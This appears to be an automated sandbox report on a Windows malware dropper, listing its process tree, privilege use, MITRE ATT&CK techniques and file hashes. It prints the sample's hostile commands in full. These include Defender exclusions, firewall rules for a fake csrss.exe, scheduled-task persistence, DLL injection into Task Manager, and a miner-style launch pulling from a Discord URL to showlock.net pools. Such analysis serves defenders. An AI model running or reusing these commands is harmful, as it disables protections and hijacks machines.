xelY93icznpSl0utJlO9CTlz.exe 5604 xelY93icznpSl0utJlO9CTlz.exe 5592 BvKx9NZLLBJyqhaHtH6KEhmS.exe -
Suspicious use of AdjustPrivilegeToken 57 IoCs
description pid Process Token: SeDebugPrivilege 5068 powershell.exe Token: SeDebugPrivilege 4556 CasPol.exe Token: SeIncreaseQuotaPrivilege 5068 powershell.exe Token: SeSecurityPrivilege 5068 powershell.exe Token: SeTakeOwnershipPrivilege 5068 powershell.exe Token: SeLoadDriverPrivilege 5068 powershell.exe Token: SeSystemProfilePrivilege 5068 powershell.exe Token: SeSystemtimePrivilege 5068 powershell.exe Token: SeProfSingleProcessPrivilege 5068 powershell.exe Token: SeIncBasePriorityPrivilege 5068 powershell.exe Token: SeCreatePagefilePrivilege 5068 powershell.exe Token: SeBackupPrivilege 5068 powershell.exe Token: SeRestorePrivilege 5068 powershell.exe Token: SeShutdownPrivilege 5068 powershell.exe Token: SeDebugPrivilege 5068 powershell.exe Token: SeSystemEnvironmentPrivilege 5068 powershell.exe Token: SeRemoteShutdownPrivilege 5068 powershell.exe Token: SeUndockPrivilege 5068 powershell.exe Token: SeManageVolumePrivilege 5068 powershell.exe Token: 33 5068 powershell.exe Token: 34 5068 powershell.exe Token: 35 5068 powershell.exe Token: 36 5068 powershell.exe Token: SeDebugPrivilege 4748 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 3200 powershell.exe Token: SeDebugPrivilege 3564 powershell.exe Token: SeDebugPrivilege 4228 7nW5qIMaV8xajTNolXyNnr62.exe Token: SeDebugPrivilege 4424 VaEY2hreTfB69fav3nHOe8uJ.exe Token: SeImpersonatePrivilege 4228 7nW5qIMaV8xajTNolXyNnr62.exe Token: SeImpersonatePrivilege 4424 VaEY2hreTfB69fav3nHOe8uJ.exe Token: SeDebugPrivilege 524 BvKx9NZLLBJyqhaHtH6KEhmS.exe Token: SeImpersonatePrivilege 524 BvKx9NZLLBJyqhaHtH6KEhmS.exe Token: SeDebugPrivilege 1748 xelY93icznpSl0utJlO9CTlz.exe Token: SeImpersonatePrivilege 1748 xelY93icznpSl0utJlO9CTlz.exe Token: SeDebugPrivilege 5944 powershell.exe Token: SeDebugPrivilege 5960 powershell.exe Token: SeDebugPrivilege 6116 powershell.exe Token: SeDebugPrivilege 6108 powershell.exe Token: SeDebugPrivilege 5236 powershell.exe Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 5168 powershell.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeDebugPrivilege 4148 powershell.exe Token: SeDebugPrivilege 4528 powershell.exe Token: SeDebugPrivilege 4764 powershell.exe Token: SeDebugPrivilege 5388 powershell.exe Token: SeDebugPrivilege 4604 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Token: SeDebugPrivilege 4792 powershell.exe Token: SeDebugPrivilege 5616 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe Token: SeSystemEnvironmentPrivilege 3204 csrss.exe Token: SeSecurityPrivilege 1772 sc.exe Token: SeSecurityPrivilege 1772 sc.exe Token: SeDebugPrivilege 6120 powershell.exe Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 6064 powershell.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 5852 u318.1.exe 5852 u318.1.exe 5852 u318.1.exe 5852 u318.1.exe 5852 u318.1.exe 5852 u318.1.exe 5852 u318.1.exe -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 5852 u318.1.exe 5852 u318.1.exe 5852 u318.1.exe 5852 u318.1.exe 5852 u318.1.exe 5852 u318.1.exe 5852 u318.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2272 wrote to memory of 5068 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 72 PID 2272 wrote to memory of 5068 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 72 PID 2272 wrote to memory of 4556 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 74 PID 2272 wrote to memory of 4556 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 74 PID 2272 wrote to memory of 4556 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 74 PID 2272 wrote to memory of 4556 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 74 PID 2272 wrote to memory of 4556 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 74 PID 2272 wrote to memory of 4556 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 74 PID 2272 wrote to memory of 4556 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 74 PID 2272 wrote to memory of 4556 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 74 PID 2272 wrote to memory of 212 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 75 PID 2272 wrote to memory of 212 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 75 PID 2272 wrote to memory of 212 2272 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe 75 PID 4556 wrote to memory of 3932 4556 CasPol.exe 79 PID 4556 wrote to memory of 3932 4556 CasPol.exe 79 PID 4556 wrote to memory of 3932 4556 CasPol.exe 79 PID 4556 wrote to memory of 4228 4556 CasPol.exe 80 PID 4556 wrote to memory of 4228 4556 CasPol.exe 80 PID 4556 wrote to memory of 4228 4556 CasPol.exe 80 PID 4556 wrote to memory of 1748 4556 CasPol.exe 81 PID 4556 wrote to memory of 1748 4556 CasPol.exe 81 PID 4556 wrote to memory of 1748 4556 CasPol.exe 81 PID 4556 wrote to memory of 4424 4556 CasPol.exe 82 PID 4556 wrote to memory of 4424 4556 CasPol.exe 82 PID 4556 wrote to memory of 4424 4556 CasPol.exe 82 PID 4556 wrote to memory of 524 4556 CasPol.exe 83 PID 4556 wrote to memory of 524 4556 CasPol.exe 83 PID 4556 wrote to memory of 524 4556 CasPol.exe 83 PID 3932 wrote to memory of 508 3932 fKZRHEfYlQuPD6l3AskVdPrk.exe 85 PID 3932 wrote to memory of 508 3932 fKZRHEfYlQuPD6l3AskVdPrk.exe 85 PID 3932 wrote to memory of 508 3932 fKZRHEfYlQuPD6l3AskVdPrk.exe 85 PID 4228 wrote to memory of 4748 4228 7nW5qIMaV8xajTNolXyNnr62.exe 87 PID 4228 wrote to memory of 4748 4228 7nW5qIMaV8xajTNolXyNnr62.exe 87 PID 4228 wrote to memory of 4748 4228 7nW5qIMaV8xajTNolXyNnr62.exe 87 PID 1748 wrote to memory of 1976 1748 xelY93icznpSl0utJlO9CTlz.exe 88 PID 1748 wrote to memory of 1976 1748 xelY93icznpSl0utJlO9CTlz.exe 88 PID 1748 wrote to memory of 1976 1748 xelY93icznpSl0utJlO9CTlz.exe 88 PID 524 wrote to memory of 3200 524 BvKx9NZLLBJyqhaHtH6KEhmS.exe 91 PID 524 wrote to memory of 3200 524 BvKx9NZLLBJyqhaHtH6KEhmS.exe 91 PID 524 wrote to memory of 3200 524 BvKx9NZLLBJyqhaHtH6KEhmS.exe 91 PID 4424 wrote to memory of 3564 4424 VaEY2hreTfB69fav3nHOe8uJ.exe 93 PID 4424 wrote to memory of 3564 4424 VaEY2hreTfB69fav3nHOe8uJ.exe 93 PID 4424 wrote to memory of 3564 4424 VaEY2hreTfB69fav3nHOe8uJ.exe 93 PID 3932 wrote to memory of 5852 3932 fKZRHEfYlQuPD6l3AskVdPrk.exe 95 PID 3932 wrote to memory of 5852 3932 fKZRHEfYlQuPD6l3AskVdPrk.exe 95 PID 3932 wrote to memory of 5852 3932 fKZRHEfYlQuPD6l3AskVdPrk.exe 95 PID 5676 wrote to memory of 5944 5676 7nW5qIMaV8xajTNolXyNnr62.exe 103 PID 5676 wrote to memory of 5944 5676 7nW5qIMaV8xajTNolXyNnr62.exe 103 PID 5676 wrote to memory of 5944 5676 7nW5qIMaV8xajTNolXyNnr62.exe 103 PID 5604 wrote to memory of 5960 5604 xelY93icznpSl0utJlO9CTlz.exe 104 PID 5604 wrote to memory of 5960 5604 xelY93icznpSl0utJlO9CTlz.exe 104 PID 5604 wrote to memory of 5960 5604 xelY93icznpSl0utJlO9CTlz.exe 104 PID 5632 wrote to memory of 6108 5632 VaEY2hreTfB69fav3nHOe8uJ.exe 107 PID 5632 wrote to memory of 6108 5632 VaEY2hreTfB69fav3nHOe8uJ.exe 107 PID 5632 wrote to memory of 6108 5632 VaEY2hreTfB69fav3nHOe8uJ.exe 107 PID 5592 wrote to memory of 6116 5592 BvKx9NZLLBJyqhaHtH6KEhmS.exe 108 PID 5592 wrote to memory of 6116 5592 BvKx9NZLLBJyqhaHtH6KEhmS.exe 108 PID 5592 wrote to memory of 6116 5592 BvKx9NZLLBJyqhaHtH6KEhmS.exe 108 PID 5676 wrote to memory of 1720 5676 7nW5qIMaV8xajTNolXyNnr62.exe 153 PID 5676 wrote to memory of 1720 5676 7nW5qIMaV8xajTNolXyNnr62.exe 153 PID 1720 wrote to memory of 5988 1720 cmd.exe 113 PID 1720 wrote to memory of 5988 1720 cmd.exe 113 PID 5604 wrote to memory of 3216 5604 xelY93icznpSl0utJlO9CTlz.exe 114 PID 5604 wrote to memory of 3216 5604 xelY93icznpSl0utJlO9CTlz.exe 114 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe" -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe"C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Users\Admin\AppData\Local\Temp\u318.0.exe"C:\Users\Admin\AppData\Local\Temp\u318.0.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 11805⤵
- Program crash
PID:3192
-
-
-
C:\Users\Admin\AppData\Local\Temp\u318.1.exe"C:\Users\Admin\AppData\Local\Temp\u318.1.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5852 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
-
-
C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe"C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe"C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5944
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5988
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:5168
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
-
-
C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe"C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe"C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5604 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5960
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:3216
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5092
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:5236
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
-
-
-
C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe"C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
-
C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe"C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:5632 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6108
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5220
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:5384
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5388
-
-
-
-
C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe"C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3200
-
-
C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe"C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6116
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:1356
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5256
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:5248
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:1764
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5616
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:1720
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:2904
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:5056 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:4088
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6120
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:806⤵
- Executes dropped EXE
PID:5920
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe6⤵
- Executes dropped EXE
PID:196
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6064
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe6⤵
- Executes dropped EXE
PID:3968
-
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵PID:212
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5276
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
Filesize
19KB
MD5358eecb6abe7d5671be391357eda3991
SHA14b553e8dfb883cbdcb80db0f7f1ba862b26c08e7
SHA256cfcfab4ad5c39913e3c10f2de820e22ee17560a0d5f4bd668ea8650d338065b7
SHA512602175b4414ac140bf624247298d3d85f623d5af3a1f3e4529c1711013f874171a4958b0d8793506f66bd0b031f23320fbd7ec131099a913d5afb302c7b26836
-
Filesize
19KB
MD5d30b64e41471005564cacc24685d4eb8
SHA158a5160710b57ced78891da46398b5f1937c3e50
SHA256cb4d28a2f2411c5190d42ee1f5a96e407d271f7ee52f7bd8cd8fd7ff8185f7d6
SHA512130073e0c5218d8e406d9cb0eaba41eb351409f762e342cfc3cb92368f2d12931420c1d52074e26c757dee544e30abb28e711e8b16af446b41825c79147d3bc5
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
2.0MB
MD51bf850b4d9587c1017a75a47680584c4
SHA175cd4738ffc07f203c3f3356bc946fdd0bcdbe19
SHA256ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955
SHA512ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08
-
Filesize
2.8MB
MD5713674d5e968cbe2102394be0b2bae6f
SHA190ac9bd8e61b2815feb3599494883526665cb81e
SHA256f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057
SHA512e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb
-
Filesize
2.0MB
MD5dcb505dc2b9d8aac05f4ca0727f5eadb
SHA14f633edb62de05f3d7c241c8bc19c1e0be7ced75
